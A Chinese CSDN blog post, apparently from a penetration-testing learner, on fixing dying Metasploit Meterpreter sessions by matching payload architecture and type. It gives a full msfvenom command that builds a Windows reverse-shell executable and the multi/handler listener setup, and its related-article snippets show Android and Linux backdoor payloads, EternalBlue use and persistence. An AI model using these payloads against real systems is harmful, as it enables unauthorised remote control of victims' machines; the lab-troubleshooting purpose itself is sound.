Meterpreter session 3 closed.Reason: Died 救救我的session

已于 2022-08-24 11:48:58 修改
阅读量4.1k 收藏 17
点赞数 5
分类专栏: 笔记 文章标签: 服务器 linux 安全
于 2022-08-24 11:36:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55793759/article/details/126475359
版权

问题

🍺用的挺好的MSF突然出了问题,直接裂开

如下图,Meterpreter session异常终止

在这里插入图片描述

当你试着发现问题时

在这里插入图片描述
只会不断增加session值

🍺参考文章
垂死挣扎?拯救你的Meterpreter session

🍺根据自己的环境情况,判断出现的问题
我这里出现两个问题:

1、架构混淆(32位/64位),在使用Metasploit时,在选择处理器体系结构时犯错误,将它们混淆在一起

🍺解决的办法是:
确保不要在msfvenom和msfconsole中混用了处理器体系结构,两端只能使用32位或64位payloads,32位、64位payloads示例:
在这里插入图片描述

2、payload不匹配,我们可能在msfvenom中指定使用windows/meterpreter/reverse_https模块payload,而在msfconsole中,却错误地选择了windows/meterpreter/reverse_tcp模块payload

🍺解决方法:对payload的匹配

(1)、生成独立的meterpreter payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -f exe > 5115.exe

(2)、设置multi handler listener

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.106
msf5 exploit(multi/handler) > set LPORT 5555
msf5 exploit(multi/handler) > run

🍺了解出现的问题,重新来一次

执行exe文件的是windows64位电脑,所以选择windows/64位的,同时确保multi handler listener使用的payload前面生成exe文件所使用的windows/x64/meterpreter/reverse_tcp是一样的

在这里插入图片描述
成功反弹Shell

感想:回过头看看,今天确实傻里傻气的,,,,,折腾了大半天,啥跟啥啊(裂开)

Meterpreter 控制持久化
Epsilon
03-01 6412
Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。 如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使
cs传shell给msf显示Meterpreter session x is not valid and will be closed
总有人间一两风,填我十万八千梦
04-27 5099
今天在公司做实验,cs和msf都安装在阿里云的vps上。当我把cs的shell传给msf的时候一直显示如下“ Meterpreter session 2 is not valid and will be closed Meterpreter session 2 closed
meterpreter session 2 closed. reason: died meterpreter自动退出
gRpc的博客
08-24 998
exploit
Meterpreter session 2 closed. Reason: Died 问题解决方法
dodod2012的专栏
06-24 2663
问题描述 用msf生成Ubuntu 16.04的反向连接木马: msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.16.252.129 LPORT=1234 -f elf > shell.elf 开启监听: msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 172.16.252.129 set lport
msf会话终止
最新发布
2302_77302329的博客
05-11 500
msf(metasploit framework) meterpreter session closed Reason: Died 会话终止。
meterpreter session 1 closed. Reason: died
gRpc的博客
08-25 1502
meterpreter session 1 closed. Reason: died
Session closed提示语说明
s1162276945的博客
02-22 787
Session closed, press ENTER to start, l to last session or q to exit.
Meterpreter命令详解
热门推荐
子曰小玖的博客
08-08 1万+
0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一...
Kali生成windows木马程序
一指流沙的博客
12-02 1441
Kali生成windows木马程序
cs派生msf shell
qq_43335965的博客
11-25 75
msf5 > use exploit/multi/handler [*] Using configured payload windows/meterpreter/reverse_http msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/...
metasploit进阶
mingyqf的博客
02-28 994
内网渗透 ms17_010_eternalblue 永恒之蓝 获取权限 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set rhost 10.10.10.136 set lport 4444 exploit
msfvenom-backdoor-android:Android后门应用程序,msfvenom android .apk的改进源代码-Android app source code
03-24
msfvenom-backdoor-android 此Android Studio项目包含由生成的后门.apk的源代码 $msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.178.30 LPORT=4444 R > result.apk (在Kali Linux套件中) 有关渗透到Android系统的过程指南,请访问我的网站(仅意大利语) 尝试解决问题: [*]Meterpreter session x closed - Reason:died 消息,通过在服务中启动有效负载来实现。 Meterpreter会话以这种方式更加稳定(原始的msfvenom apk通常会导致会话很快终止) 在此项目中,后门可在LAN设置中工作,在端口4444上打开到192.168.178.30的Meterpreter会话(如果要在WA
Command shell session 2 closed
幽幽云海
05-18 5179
问题描述: 生成一个 xxx.deb 反弹shell客户端, 在客户端安装xxx.deb之后,反弹shell显示已经建立session但是随即就close。 查了一会,查看 show options 时,发现 payload 忘记配置: 重新配置payload 再次连接测试 OK 正常建立连接 ...
你的手机曾经被监控过吗?
ailx10
08-07 1436
生活中,经常有人说自己手机被监控了,微信聊天记录被监控了,手机摄像头被打开了。今天我做了一个简单的测试,验证了安卓9会被监控,安卓11不会被监控,腾讯手机管家可以成功查杀到木马病毒,因此,针对手机被监控的知友们,不要下载色情APP,买好一点的手机,并且安装杀毒软件,安装新软件之后,立马进行病毒检测。第一步:黑客或骗子团伙会准备好一个木马病毒,比如色情APP第二步:黑客或骗子团伙,会在公网上配置好监...
metasploit查看目标机上的所有流量
天元喜羊羊的博客
04-27 1743
meterpreter > run packetrecorder -i 1 [*] Starting Packet capture on interface 1 [+] Packet capture started [*] Packets being saved in to /root/.msf4/logs/scripts/packetrecorder/ROOT-9743DD32E3_201304
meterpreter使用详解
lweiheng blog
01-07 4186
meterpreter使用详解 文章目录meterpreter使用详解0 meterpreter简介1 meterpreter控制技巧总结1.1 命令详解1.2 sessions 控制命令1.3 meterpreter收集信息1.3.1 meterpreter 收集windows主机信息1.3.1.1 收集系统信息1.3.1.2 收集本地(域)用户信息1.3.1.3 收集当前用户信息1.3.1.4...
Meterpreter
qq_31411551的博客
05-22 2144
1. 截屏 meterpreter > screenshot Screenshot saved to: /root/fLvRrVTL.jpeg 2. sysinfo meterpreter > sysinfo Computer : DH-CA8822AB9589 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Doma
突破meterpreter建立永久访问权限访问其他主机——借刀杀人
渗透测试
05-09 1981
文章目录前言一、使用场景二、实施步骤1.渗透b主机2.建立socks代理服务器3.设置浏览器代理4.设置永久访问权限总结 前言 渗透目标主机,对目标主机搭建跳板建立代理服务器,通过代理主机访问其他主机,不留痕迹 一、使用场景 主机a想访问c无法访问,c只让特定的IP地址访问,例如b,此时就可以先渗透b,在上面搭建跳板建立代理服务器,通过代理服务器访问c 本期例子,a主机使用kali,b主机winxp,c主机linux 二、实施步骤 1.渗透b主机 因为目标位winxp,先使用最常用的MS08_06
Metasploit 快速入门(三)—— 服务端漏洞利用
gclome的博客
07-22 2724
今天的这篇文章是对Metasploit 快速入门(三)—— 服务端漏洞利用这篇文章的复现。有些地方由于环境配不好,就直接把原文的图copy过来了! 温馨提示:靶机用自己的虚拟机就好,如果不想搞坏你的虚拟机,记得加快照、加快照、快照 原创:合天网安实验室合天智汇 在前面,我们学习了 Metasploit快速入门(一) Metasploit快速入门(二) Metasploit 快速入门(二)——信息收集和扫描-续 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型
msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.1.108:4567 [*] Sending stage (77780 bytes) to 192.168.1.102 [*] - Meterpreter session 2 closed. Reason: Died
05-27
这是一个 Metasploit 框架下的 exploit(multi/handler) 模块的运行结果。根据输出信息可以看出,Metasploit 成功启动了一个反向 TCP handler,监听本地 IP 地址为 192.168.1.108,端口号为 4567。接着,Metasploit 发送了一个大小为 77780 字节的 payload 到 IP 地址为 192.168.1.102 的目标主机。但是,Meterpreter 会话 2 在执行过程中异常退出,具体原因可能是目标主机上的防火墙或杀毒软件拦截了 payload 或者 exploit 中出现了 bug。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值